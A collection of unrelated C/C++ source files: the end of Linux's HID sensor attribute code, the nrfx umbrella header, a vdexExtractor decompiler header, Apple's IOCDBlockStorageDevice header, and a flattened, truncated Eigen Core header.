	return ret;
}
EXPORT_SYMBOL(hid_sensor_write_samp_freq_value);

/*
 * Read the sensitivity (hysteresis) feature report and decode it from
 * VTF format into *val1/*val2.  Returns IIO_VAL_INT_PLUS_MICRO on
 * success, -EINVAL on failure.
 */
int hid_sensor_read_raw_hyst_value(struct hid_sensor_common *st,
				   int *val1, int *val2)
{
	s32 value;
	int ret;

	ret = sensor_hub_get_feature(st->hsdev,
				     st->sensitivity.report_id,
				     st->sensitivity.index, &value);
	if (ret < 0 || value < 0) {
		*val1 = *val2 = 0;
		return -EINVAL;
	} else {
		convert_from_vtf_format(value, st->sensitivity.size,
					st->sensitivity.unit_expo,
					val1, val2);
	}

	return IIO_VAL_INT_PLUS_MICRO;
}
EXPORT_SYMBOL(hid_sensor_read_raw_hyst_value);

/*
 * Encode val1/val2 into VTF format and write the sensitivity
 * (hysteresis) feature report.  Returns 0 on success, negative error
 * otherwise.
 */
int hid_sensor_write_raw_hyst_value(struct hid_sensor_common *st,
				    int val1, int val2)
{
	s32 value;
	int ret;

	value = convert_to_vtf_format(st->sensitivity.size,
				      st->sensitivity.unit_expo,
				      val1, val2);
	ret = sensor_hub_set_feature(st->hsdev,
				     st->sensitivity.report_id,
				     st->sensitivity.index, value);
	if (ret < 0 || value < 0)
		ret = -EINVAL;

	return ret;
}
EXPORT_SYMBOL(hid_sensor_write_raw_hyst_value);

/*
 * Look up the feature-report attribute info (poll interval, report
 * state, power state, sensitivity) common to all HID sensors for the
 * given usage id.  Always returns 0.
 */
int hid_sensor_parse_common_attributes(struct hid_sensor_hub_device *hsdev,
				       u32 usage_id,
				       struct hid_sensor_common *st)
{
	sensor_hub_input_get_attribute_info(hsdev,
					    HID_FEATURE_REPORT, usage_id,
					    HID_USAGE_SENSOR_PROP_REPORT_INTERVAL,
					    &st->poll);

	sensor_hub_input_get_attribute_info(hsdev,
					    HID_FEATURE_REPORT, usage_id,
					    HID_USAGE_SENSOR_PROP_REPORT_STATE,
					    &st->report_state);

	/*
	 * NOTE(review): "PROY" is not a typo introduced here — it matches
	 * the constant as declared in hid-sensor-ids.h; renaming it only
	 * in this file would break the build.
	 */
	sensor_hub_input_get_attribute_info(hsdev,
					    HID_FEATURE_REPORT, usage_id,
					    HID_USAGE_SENSOR_PROY_POWER_STATE,
					    &st->power_state);

	sensor_hub_input_get_attribute_info(hsdev,
					    HID_FEATURE_REPORT, usage_id,
					    HID_USAGE_SENSOR_PROP_SENSITIVITY_ABS,
					    &st->sensitivity);

	hid_dbg(hsdev->hdev, "common attributes: %x:%x, %x:%x, %x:%x %x:%x\n",
		st->poll.index, st->poll.report_id,
		st->report_state.index, st->report_state.report_id,
		st->power_state.index, st->power_state.report_id,
		st->sensitivity.index, st->sensitivity.report_id);

	return 0;
}
EXPORT_SYMBOL(hid_sensor_parse_common_attributes);

MODULE_AUTHOR("Srinivas Pandruvada <srinivas.pandruvada@intel.com>");
MODULE_DESCRIPTION("HID Sensor common attribute processing");
MODULE_LICENSE("GPL");
{ "language": "C" }
/*
 * Copyright (c) 2017 - 2020, Nordic Semiconductor ASA
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions are met:
 *
 * 1. Redistributions of source code must retain the above copyright notice, this
 *    list of conditions and the following disclaimer.
 *
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 *
 * 3. Neither the name of the copyright holder nor the names of its
 *    contributors may be used to endorse or promote products derived from this
 *    software without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
 * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
 * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
 * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
 * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
 * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 * POSSIBILITY OF SUCH DAMAGE.
 */

#ifndef NRFX_H__
#define NRFX_H__

/*
 * Umbrella header for the nrfx package: pulls in, in order, the per-SoC
 * configuration, the common driver declarations, the HAL common
 * definitions, the environment-specific glue layer, and the shared
 * error codes.
 */
#include <nrfx_config.h>
#include <drivers/nrfx_common.h>
#include <hal/nrf_common.h>
#include <nrfx_glue.h>
#include <drivers/nrfx_errors.h>

#endif // NRFX_H__
{ "language": "C" }
/* vdexExtractor ----------------------------------------- Anestis Bechtsoudis <anestis@census-labs.com> Copyright 2017 - 2018 by CENSUS S.A. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ #ifndef _VDEX_DECOMPILER_010_H_ #define _VDEX_DECOMPILER_010_H_ #include "../common.h" #include "../dex.h" #include "../dex_instruction.h" #include "vdex_common.h" // Dex decompiler driver function using quicken_info data bool vdex_decompiler_010_decompile(const u1 *, dexMethod *, const vdex_data_array_t *, bool); // Dex decompiler walk method that simply disassembles code blocks void vdex_decompiler_010_walk(const u1 *, dexMethod *); #endif
{ "language": "C" }
/*
 * Copyright (c) 1998-2012 Apple Inc. All rights reserved.
 *
 * @APPLE_LICENSE_HEADER_START@
 *
 * This file contains Original Code and/or Modifications of Original Code
 * as defined in and that are subject to the Apple Public Source License
 * Version 2.0 (the 'License'). You may not use this file except in
 * compliance with the License. Please obtain a copy of the License at
 * http://www.opensource.apple.com/apsl/ and read it before using this
 * file.
 *
 * The Original Code and all software distributed under the License are
 * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
 * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
 * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
 * Please see the License for the specific language governing rights and
 * limitations under the License.
 *
 * @APPLE_LICENSE_HEADER_END@
 */

/*!
 * @header IOCDBlockStorageDevice
 * @abstract
 * This header contains the IOCDBlockStorageDevice class definition.
 */

#ifndef _IOCDBLOCKSTORAGEDEVICE_H
#define _IOCDBLOCKSTORAGEDEVICE_H

#include <IOKit/storage/IOCDTypes.h>

/*!
 * @defined kIOCDBlockStorageDeviceClass
 * @abstract
 * kIOCDBlockStorageDeviceClass is the name of the IOCDBlockStorageDevice class.
 * @discussion
 * kIOCDBlockStorageDeviceClass is the name of the IOCDBlockStorageDevice class.
 */

#define kIOCDBlockStorageDeviceClass "IOCDBlockStorageDevice"

#ifdef KERNEL
#ifdef __cplusplus

/*
 * Kernel
 */

#include <IOKit/storage/IOBlockStorageDevice.h>

/* Property used for matching, so the generic driver gets the nub it wants. */
#define kIOBlockStorageDeviceTypeCDROM "CDROM"

/*!
 * @class
 * IOCDBlockStorageDevice : public IOBlockStorageDevice
 * @abstract
 * The IOCDBlockStorageDevice class is a generic CD block storage device
 * abstraction.
 * @discussion
 * This class is the protocol for generic CD functionality, independent of
 * the physical connection protocol (e.g. SCSI, ATA, USB).
 *
 * The APIs are the union of CD (block storage) data APIs and all
 * necessary low-level CD APIs.
 *
 * A subclass implements relay methods that translate our requests into
 * calls to a protocol- and device-specific provider.
 */

class IOCDBlockStorageDevice : public IOBlockStorageDevice {
    OSDeclareAbstractStructors(IOCDBlockStorageDevice)

protected:

    /* Empty padding slot so the class can grow without breaking the
     * binary interface (standard IOKit expansion-data pattern). */
    struct ExpansionData { /* */ };
    ExpansionData * _expansionData;

public:

    /* Overrides from IORegistryEntry */

    virtual bool init(OSDictionary * properties);

    /*-----------------------------------------*/
    /* CD APIs                                 */
    /*-----------------------------------------*/

    virtual IOReturn doAsyncReadCD(IOMemoryDescriptor *buffer,
                                   UInt32 block, UInt32 nblks,
                                   CDSectorArea sectorArea,
                                   CDSectorType sectorType,
                                   IOStorageCompletion completion) = 0;
    virtual UInt32 getMediaType(void) = 0;
    virtual IOReturn readISRC(UInt8 track, CDISRC isrc) = 0;
    virtual IOReturn readMCN(CDMCN mcn) = 0;
    virtual IOReturn readTOC(IOMemoryDescriptor *buffer) = 0;

#ifndef __LP64__
    /*-----------------------------------------*/
    /* APIs exported by IOCDAudioControl       */
    /*-----------------------------------------*/

    /* Legacy analog CD-audio control; 32-bit builds only, all deprecated. */
    virtual IOReturn audioPause(bool pause) __attribute__ ((deprecated));
    virtual IOReturn audioPlay(CDMSF timeStart, CDMSF timeStop) __attribute__ ((deprecated));
    virtual IOReturn audioScan(CDMSF timeStart, bool reverse) __attribute__ ((deprecated));
    virtual IOReturn audioStop() __attribute__ ((deprecated));
    virtual IOReturn getAudioStatus(CDAudioStatus *status) __attribute__ ((deprecated));
    virtual IOReturn getAudioVolume(UInt8 *leftVolume, UInt8 *rightVolume) __attribute__ ((deprecated));
    virtual IOReturn setAudioVolume(UInt8 leftVolume, UInt8 rightVolume) __attribute__ ((deprecated));
#endif /* !__LP64__ */

    /*-----------------------------------------*/
    /* CD APIs                                 */
    /*-----------------------------------------*/

    /* Pure virtual on 64-bit; on 32-bit these were added after the initial
     * release, so they are ordinary virtuals occupying the reserved slots
     * marked "Used" below. */
#ifdef __LP64__
    virtual IOReturn getSpeed(UInt16 * kilobytesPerSecond) = 0;
    virtual IOReturn setSpeed(UInt16 kilobytesPerSecond) = 0;
    virtual IOReturn readTOC(IOMemoryDescriptor *buffer, CDTOCFormat format,
                             UInt8 msf, UInt8 trackSessionNumber,
                             UInt16 *actualByteCount) = 0;
    virtual IOReturn readDiscInfo(IOMemoryDescriptor *buffer,
                                  UInt16 *actualByteCount) = 0;
    virtual IOReturn readTrackInfo(IOMemoryDescriptor *buffer, UInt32 address,
                                   CDTrackInfoAddressType addressType,
                                   UInt16 *actualByteCount) = 0;
#else /* !__LP64__ */
    virtual IOReturn getSpeed(UInt16 * kilobytesPerSecond); /* 10.1.0 */
    virtual IOReturn setSpeed(UInt16 kilobytesPerSecond); /* 10.1.0 */
    virtual IOReturn readTOC(IOMemoryDescriptor *buffer, CDTOCFormat format,
                             UInt8 msf, UInt8 trackSessionNumber,
                             UInt16 *actualByteCount); /* 10.1.3 */
    virtual IOReturn readDiscInfo(IOMemoryDescriptor *buffer,
                                  UInt16 *actualByteCount); /* 10.1.3 */
    virtual IOReturn readTrackInfo(IOMemoryDescriptor *buffer, UInt32 address,
                                   CDTrackInfoAddressType addressType,
                                   UInt16 *actualByteCount); /* 10.1.3 */
#endif /* !__LP64__ */

    /* Reserved vtable slots for future expansion (ABI padding). */
#ifdef __LP64__
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice,  0);
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice,  1);
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice,  2);
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice,  3);
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice,  4);
#else /* !__LP64__ */
    OSMetaClassDeclareReservedUsed(IOCDBlockStorageDevice,  0);
    OSMetaClassDeclareReservedUsed(IOCDBlockStorageDevice,  1);
    OSMetaClassDeclareReservedUsed(IOCDBlockStorageDevice,  2);
    OSMetaClassDeclareReservedUsed(IOCDBlockStorageDevice,  3);
    OSMetaClassDeclareReservedUsed(IOCDBlockStorageDevice,  4);
#endif /* !__LP64__ */
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice,  5);
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice,  6);
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice,  7);
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice,  8);
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice,  9);
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 10);
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 11);
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 12);
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 13);
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 14);
    OSMetaClassDeclareReservedUnused(IOCDBlockStorageDevice, 15);
};

#endif /* __cplusplus */
#endif /* KERNEL */
#endif /* !_IOCDBLOCKSTORAGEDEVICE_H */
{ "language": "C" }
// This file is part of Eigen, a lightweight C++ template library // for linear algebra. // // Copyright (C) 2008 Gael Guennebaud <gael.guennebaud@inria.fr> // Copyright (C) 2007-2011 Benoit Jacob <jacob.benoit.1@gmail.com> // // This Source Code Form is subject to the terms of the Mozilla // Public License v. 2.0. If a copy of the MPL was not distributed // with this file, You can obtain one at http://mozilla.org/MPL/2.0/. #ifndef EIGEN_CORE_H #define EIGEN_CORE_H // first thing Eigen does: stop the compiler from committing suicide #include "src/Core/util/DisableStupidWarnings.h" // Handle NVCC/CUDA/SYCL #if defined(__CUDACC__) || defined(__SYCL_DEVICE_ONLY__) // Do not try asserts on CUDA and SYCL! #ifndef EIGEN_NO_DEBUG #define EIGEN_NO_DEBUG #endif #ifdef EIGEN_INTERNAL_DEBUGGING #undef EIGEN_INTERNAL_DEBUGGING #endif #ifdef EIGEN_EXCEPTIONS #undef EIGEN_EXCEPTIONS #endif // All functions callable from CUDA code must be qualified with __device__ #ifdef __CUDACC__ // Do not try to vectorize on CUDA and SYCL! #ifndef EIGEN_DONT_VECTORIZE #define EIGEN_DONT_VECTORIZE #endif #define EIGEN_DEVICE_FUNC __host__ __device__ // We need math_functions.hpp to ensure that that EIGEN_USING_STD_MATH macro // works properly on the device side #include <math_functions.hpp> #else #define EIGEN_DEVICE_FUNC #endif #else #define EIGEN_DEVICE_FUNC #endif // When compiling CUDA device code with NVCC, pull in math functions from the // global namespace. In host mode, and when device doee with clang, use the // std versions. #if defined(__CUDA_ARCH__) && defined(__NVCC__) #define EIGEN_USING_STD_MATH(FUNC) using ::FUNC; #else #define EIGEN_USING_STD_MATH(FUNC) using std::FUNC; #endif #if (defined(_CPPUNWIND) || defined(__EXCEPTIONS)) && !defined(__CUDA_ARCH__) && !defined(EIGEN_EXCEPTIONS) && !defined(EIGEN_USE_SYCL) #define EIGEN_EXCEPTIONS #endif #ifdef EIGEN_EXCEPTIONS #include <new> #endif // then include this file where all our macros are defined. 
It's really important to do it first because // it's where we do all the alignment settings (platform detection and honoring the user's will if he // defined e.g. EIGEN_DONT_ALIGN) so it needs to be done before we do anything with vectorization. #include "src/Core/util/Macros.h" // Disable the ipa-cp-clone optimization flag with MinGW 6.x or newer (enabled by default with -O3) // See http://eigen.tuxfamily.org/bz/show_bug.cgi?id=556 for details. #if EIGEN_COMP_MINGW && EIGEN_GNUC_AT_LEAST(4,6) #pragma GCC optimize ("-fno-ipa-cp-clone") #endif #include <complex> // this include file manages BLAS and MKL related macros // and inclusion of their respective header files #include "src/Core/util/MKL_support.h" // if alignment is disabled, then disable vectorization. Note: EIGEN_MAX_ALIGN_BYTES is the proper check, it takes into // account both the user's will (EIGEN_MAX_ALIGN_BYTES,EIGEN_DONT_ALIGN) and our own platform checks #if EIGEN_MAX_ALIGN_BYTES==0 #ifndef EIGEN_DONT_VECTORIZE #define EIGEN_DONT_VECTORIZE #endif #endif #if EIGEN_COMP_MSVC #include <malloc.h> // for _aligned_malloc -- need it regardless of whether vectorization is enabled #if (EIGEN_COMP_MSVC >= 1500) // 2008 or later // Remember that usage of defined() in a #define is undefined by the standard. // a user reported that in 64-bit mode, MSVC doesn't care to define _M_IX86_FP. #if (defined(_M_IX86_FP) && (_M_IX86_FP >= 2)) || EIGEN_ARCH_x86_64 #define EIGEN_SSE2_ON_MSVC_2008_OR_LATER #endif #endif #else // Remember that usage of defined() in a #define is undefined by the standard #if (defined __SSE2__) && ( (!EIGEN_COMP_GNUC) || EIGEN_COMP_ICC || EIGEN_GNUC_AT_LEAST(4,2) ) #define EIGEN_SSE2_ON_NON_MSVC_BUT_NOT_OLD_GCC #endif #endif #ifndef EIGEN_DONT_VECTORIZE #if defined (EIGEN_SSE2_ON_NON_MSVC_BUT_NOT_OLD_GCC) || defined(EIGEN_SSE2_ON_MSVC_2008_OR_LATER) // Defines symbols for compile-time detection of which instructions are // used. 
// EIGEN_VECTORIZE_YY is defined if and only if the instruction set YY is used #define EIGEN_VECTORIZE #define EIGEN_VECTORIZE_SSE #define EIGEN_VECTORIZE_SSE2 // Detect sse3/ssse3/sse4: // gcc and icc defines __SSE3__, ... // there is no way to know about this on msvc. You can define EIGEN_VECTORIZE_SSE* if you // want to force the use of those instructions with msvc. #ifdef __SSE3__ #define EIGEN_VECTORIZE_SSE3 #endif #ifdef __SSSE3__ #define EIGEN_VECTORIZE_SSSE3 #endif #ifdef __SSE4_1__ #define EIGEN_VECTORIZE_SSE4_1 #endif #ifdef __SSE4_2__ #define EIGEN_VECTORIZE_SSE4_2 #endif #ifdef __AVX__ #define EIGEN_VECTORIZE_AVX #define EIGEN_VECTORIZE_SSE3 #define EIGEN_VECTORIZE_SSSE3 #define EIGEN_VECTORIZE_SSE4_1 #define EIGEN_VECTORIZE_SSE4_2 #endif #ifdef __AVX2__ #define EIGEN_VECTORIZE_AVX2 #endif #ifdef __FMA__ #define EIGEN_VECTORIZE_FMA #endif #if defined(__AVX512F__) && defined(EIGEN_ENABLE_AVX512) #define EIGEN_VECTORIZE_AVX512 #define EIGEN_VECTORIZE_AVX2 #define EIGEN_VECTORIZE_AVX #define EIGEN_VECTORIZE_FMA #ifdef __AVX512DQ__ #define EIGEN_VECTORIZE_AVX512DQ #endif #endif // include files // This extern "C" works around a MINGW-w64 compilation issue // https://sourceforge.net/tracker/index.php?func=detail&aid=3018394&group_id=202880&atid=983354 // In essence, intrin.h is included by windows.h and also declares intrinsics (just as emmintrin.h etc. below do). // However, intrin.h uses an extern "C" declaration, and g++ thus complains of duplicate declarations // with conflicting linkage. The linkage for intrinsics doesn't matter, but at that stage the compiler doesn't know; // so, to avoid compile errors when windows.h is included after Eigen/Core, ensure intrinsics are extern "C" here too. // notice that since these are C headers, the extern "C" is theoretically needed anyways. extern "C" { // In theory we should only include immintrin.h and not the other *mmintrin.h header files directly. // Doing so triggers some issues with ICC. 
However old gcc versions seems to not have this file, thus: #if EIGEN_COMP_ICC >= 1110 #include <immintrin.h> #else #include <mmintrin.h> #include <emmintrin.h> #include <xmmintrin.h> #ifdef EIGEN_VECTORIZE_SSE3 #include <pmmintrin.h> #endif #ifdef EIGEN_VECTORIZE_SSSE3 #include <tmmintrin.h> #endif #ifdef EIGEN_VECTORIZE_SSE4_1 #include <smmintrin.h> #endif #ifdef EIGEN_VECTORIZE_SSE4_2 #include <nmmintrin.h> #endif #if defined(EIGEN_VECTORIZE_AVX) || defined(EIGEN_VECTORIZE_AVX512) #include <immintrin.h> #endif #endif } // end extern "C" #elif defined __VSX__ #define EIGEN_VECTORIZE #define EIGEN_VECTORIZE_VSX #include <altivec.h> // We need to #undef all these ugly tokens defined in <altivec.h> // => use __vector instead of vector #undef bool #undef vector #undef pixel #elif defined __ALTIVEC__ #define EIGEN_VECTORIZE #define EIGEN_VECTORIZE_ALTIVEC #include <altivec.h> // We need to #undef all these ugly tokens defined in <altivec.h> // => use __vector instead of vector #undef bool #undef vector #undef pixel #elif (defined __ARM_NEON) || (defined __ARM_NEON__) #define EIGEN_VECTORIZE #define EIGEN_VECTORIZE_NEON #include <arm_neon.h> #elif (defined __s390x__ && defined __VEC__) #define EIGEN_VECTORIZE #define EIGEN_VECTORIZE_ZVECTOR #include <vecintrin.h> #endif #endif #if defined(__F16C__) && !defined(EIGEN_COMP_CLANG) // We can use the optimized fp16 to float and float to fp16 conversion routines #define EIGEN_HAS_FP16_C #endif #if defined __CUDACC__ #define EIGEN_VECTORIZE_CUDA #include <vector_types.h> #if defined __CUDACC_VER__ && __CUDACC_VER__ >= 70500 #define EIGEN_HAS_CUDA_FP16 #endif #endif #if defined EIGEN_HAS_CUDA_FP16 #include <host_defines.h> #include <cuda_fp16.h> #endif #if (defined _OPENMP) && (!defined EIGEN_DONT_PARALLELIZE) #define EIGEN_HAS_OPENMP #endif #ifdef EIGEN_HAS_OPENMP #include <omp.h> #endif // MSVC for windows mobile does not have the errno.h file #if !(EIGEN_COMP_MSVC && EIGEN_OS_WINCE) && !EIGEN_COMP_ARM #define 
EIGEN_HAS_ERRNO #endif #ifdef EIGEN_HAS_ERRNO #include <cerrno> #endif #include <cstddef> #include <cstdlib> #include <cmath> #include <cassert> #include <functional> #include <iosfwd> #include <cstring> #include <string> #include <limits> #include <climits> // for CHAR_BIT // for min/max: #include <algorithm> // for std::is_nothrow_move_assignable #ifdef EIGEN_INCLUDE_TYPE_TRAITS #include <type_traits> #endif // for outputting debug info #ifdef EIGEN_DEBUG_ASSIGN #include <iostream> #endif // required for __cpuid, needs to be included after cmath #if EIGEN_COMP_MSVC && EIGEN_ARCH_i386_OR_x86_64 && !EIGEN_OS_WINCE #include <intrin.h> #endif /** \brief Namespace containing all symbols from the %Eigen library. */ namespace Eigen { inline static const char *SimdInstructionSetsInUse(void) { #if defined(EIGEN_VECTORIZE_AVX512) return "AVX512, FMA, AVX2, AVX, SSE, SSE2, SSE3, SSSE3, SSE4.1, SSE4.2"; #elif defined(EIGEN_VECTORIZE_AVX) return "AVX SSE, SSE2, SSE3, SSSE3, SSE4.1, SSE4.2"; #elif defined(EIGEN_VECTORIZE_SSE4_2) return "SSE, SSE2, SSE3, SSSE3, SSE4.1, SSE4.2"; #elif defined(EIGEN_VECTORIZE_SSE4_1) return "SSE, SSE2, SSE3, SSSE3, SSE4.1"; #elif defined(EIGEN_VECTORIZE_SSSE3) return "SSE, SSE2, SSE3, SSSE3"; #elif defined(EIGEN_VECTORIZE_SSE3) return "SSE, SSE2, SSE3"; #elif defined(EIGEN_VECTORIZE_SSE2) return "SSE, SSE2"; #elif defined(EIGEN_VECTORIZE_ALTIVEC) return "AltiVec"; #elif defined(EIGEN_VECTORIZE_VSX) return "VSX"; #elif defined(EIGEN_VECTORIZE_NEON) return "ARM NEON"; #elif defined(EIGEN_VECTORIZE_ZVECTOR) return "S390X ZVECTOR"; #else return "None"; #endif } } // end namespace Eigen #if defined EIGEN2_SUPPORT_STAGE40_FULL_EIGEN3_STRICTNESS || defined EIGEN2_SUPPORT_STAGE30_FULL_EIGEN3_API || defined EIGEN2_SUPPORT_STAGE20_RESOLVE_API_CONFLICTS || defined EIGEN2_SUPPORT_STAGE10_FULL_EIGEN2_API || defined EIGEN2_SUPPORT // This will generate an error message: #error Eigen2-support is only available up to version 3.2. 
Please go to "http://eigen.tuxfamily.org/index.php?title=Eigen2" for further information #endif namespace Eigen { // we use size_t frequently and we'll never remember to prepend it with std:: everytime just to // ensure QNX/QCC support using std::size_t; // gcc 4.6.0 wants std:: for ptrdiff_t using std::ptrdiff_t; } /** \defgroup Core_Module Core module * This is the main module of Eigen providing dense matrix and vector support * (both fixed and dynamic size) with all the features corresponding to a BLAS library * and much more... * * \code * #include <Eigen/Core> * \endcode */ #include "src/Core/util/Constants.h" #include "src/Core/util/Meta.h" #include "src/Core/util/ForwardDeclarations.h" #include "src/Core/util/StaticAssert.h" #include "src/Core/util/XprHelper.h" #include "src/Core/util/Memory.h" #include "src/Core/NumTraits.h" #include "src/Core/MathFunctions.h" #include "src/Core/GenericPacketMath.h" #include "src/Core/MathFunctionsImpl.h" #if defined EIGEN_VECTORIZE_AVX512 #include "src/Core/arch/SSE/PacketMath.h" #include "src/Core/arch/AVX/PacketMath.h" #include "src/Core/arch/AVX512/PacketMath.h" #include "src/Core/arch/AVX512/MathFunctions.h" #elif defined EIGEN_VECTORIZE_AVX // Use AVX for floats and doubles, SSE for integers #include "src/Core/arch/SSE/PacketMath.h" #include "src/Core/arch/SSE/Complex.h" #include "src/Core/arch/SSE/MathFunctions.h" #include "src/Core/arch/AVX/PacketMath.h" #include "src/Core/arch/AVX/MathFunctions.h" #include "src/Core/arch/AVX/Complex.h" #include "src/Core/arch/AVX/TypeCasting.h" #elif defined EIGEN_VECTORIZE_SSE #include "src/Core/arch/SSE/PacketMath.h" #include "src/Core/arch/SSE/MathFunctions.h" #include "src/Core/arch/SSE/Complex.h" #include "src/Core/arch/SSE/TypeCasting.h" #elif defined(EIGEN_VECTORIZE_ALTIVEC) || defined(EIGEN_VECTORIZE_VSX) #include "src/Core/arch/AltiVec/PacketMath.h" #include "src/Core/arch/AltiVec/MathFunctions.h" #include "src/Core/arch/AltiVec/Complex.h" #elif defined 
EIGEN_VECTORIZE_NEON #include "src/Core/arch/NEON/PacketMath.h" #include "src/Core/arch/NEON/MathFunctions.h" #include "src/Core/arch/NEON/Complex.h" #elif defined EIGEN_VECTORIZE_ZVECTOR #include "src/Core/arch/ZVector/PacketMath.h" #include "src/Core/arch/ZVector/MathFunctions.h" #include "src/Core/arch/ZVector/Complex.h" #endif // Half float support #include "src/Core/arch/CUDA/Half.h" #include "src/Core/arch/CUDA/PacketMathHalf.h" #include "src/Core/arch/CUDA/TypeCasting.h" #if defined EIGEN_VECTORIZE_CUDA #include "src/Core/arch/CUDA/PacketMath.h" #include "src/Core/arch/CUDA/MathFunctions.h" #endif #include "src/Core/arch/Default/Settings.h" #include "src/Core/functors/TernaryFunctors.h" #include "src/Core/functors/BinaryFunctors.h" #include "src/Core/functors/UnaryFunctors.h" #include "src/Core/functors/NullaryFunctors.h" #include "src/Core/functors/StlFunctors.h" #include "src/Core/functors/AssignmentFunctors.h" // Specialized functors to enable the processing of complex numbers // on CUDA devices #include "src/Core/arch/CUDA/Complex.h" #include "src/Core/IO.h" #include "src/Core/DenseCoeffsBase.h" #include "src/Core/DenseBase.h" #include "src/Core/MatrixBase.h" #include "src/Core/EigenBase.h" #include "src/Core/Product.h" #include "src/Core/CoreEvaluators.h" #include "src/Core/AssignEvaluator.h" #ifndef EIGEN_PARSED_BY_DOXYGEN // work around Doxygen bug triggered by Assign.h r814874 // at least confirmed with Doxygen 1.5.5 and 1.5.6 #include "src/Core/Assign.h" #endif #include "src/Core/ArrayBase.h" #include "src/Core/util/BlasUtil.h" #include "src/Core/DenseStorage.h" #include "src/Core/NestByValue.h" // #include "src/Core/ForceAlignedAccess.h" #include "src/Core/ReturnByValue.h" #include "src/Core/NoAlias.h" #include "src/Core/PlainObjectBase.h" #include "src/Core/Matrix.h" #include "src/Core/Array.h" #include "src/Core/CwiseTernaryOp.h" #include "src/Core/CwiseBinaryOp.h" #include "src/Core/CwiseUnaryOp.h" #include "src/Core/CwiseNullaryOp.h" #include 
"src/Core/CwiseUnaryView.h" #include "src/Core/SelfCwiseBinaryOp.h" #include "src/Core/Dot.h" #include "src/Core/StableNorm.h" #include "src/Core/Stride.h" #include "src/Core/MapBase.h" #include "src/Core/Map.h" #include "src/Core/Ref.h" #include "src/Core/Block.h" #include "src/Core/VectorBlock.h" #include "src/Core/Transpose.h" #include "src/Core/DiagonalMatrix.h" #include "src/Core/Diagonal.h" #include "src/Core/DiagonalProduct.h" #include "src/Core/Redux.h" #include "src/Core/Visitor.h" #include "src/Core/Fuzzy.h" #include "src/Core/Swap.h" #include "src/Core/CommaInitializer.h" #include "src/Core/GeneralProduct.h" #include "src/Core/Solve.h" #include "src/Core/Inverse.h" #include "src/Core/SolverBase.h" #include "src/Core/PermutationMatrix.h" #include "src/Core/Transpositions.h" #include "src/Core/TriangularMatrix.h" #include "src/Core/SelfAdjointView.h" #include "src/Core/products/GeneralBlockPanelKernel.h" #include "src/Core/products/Parallelizer.h" #include "src/Core/ProductEvaluators.h" #include "src/Core/products/GeneralMatrixVector.h" #include "src/Core/products/GeneralMatrixMatrix.h" #include "src/Core/SolveTriangular.h" #include "src/Core/products/GeneralMatrixMatrixTriangular.h" #include "src/Core/products/SelfadjointMatrixVector.h" #include "src/Core/products/SelfadjointMatrixMatrix.h" #include "src/Core/products/SelfadjointProduct.h" #include "src/Core/products/SelfadjointRank2Update.h" #include "src/Core/products/TriangularMatrixVector.h" #include "src/Core/products/TriangularMatrixMatrix.h" #include "src/Core/products/TriangularSolverMatrix.h" #include "src/Core/products/TriangularSolverVector.h" #include "src/Core/BandMatrix.h" #include "src/Core/CoreIterators.h" #include "src/Core/ConditionEstimator.h" #include "src/Core/BooleanRedux.h" #include "src/Core/Select.h" #include "src/Core/VectorwiseOp.h" #include "src/Core/Random.h" #include "src/Core/Replicate.h" #include "src/Core/Reverse.h" #include "src/Core/ArrayWrapper.h" #ifdef EIGEN_USE_BLAS 
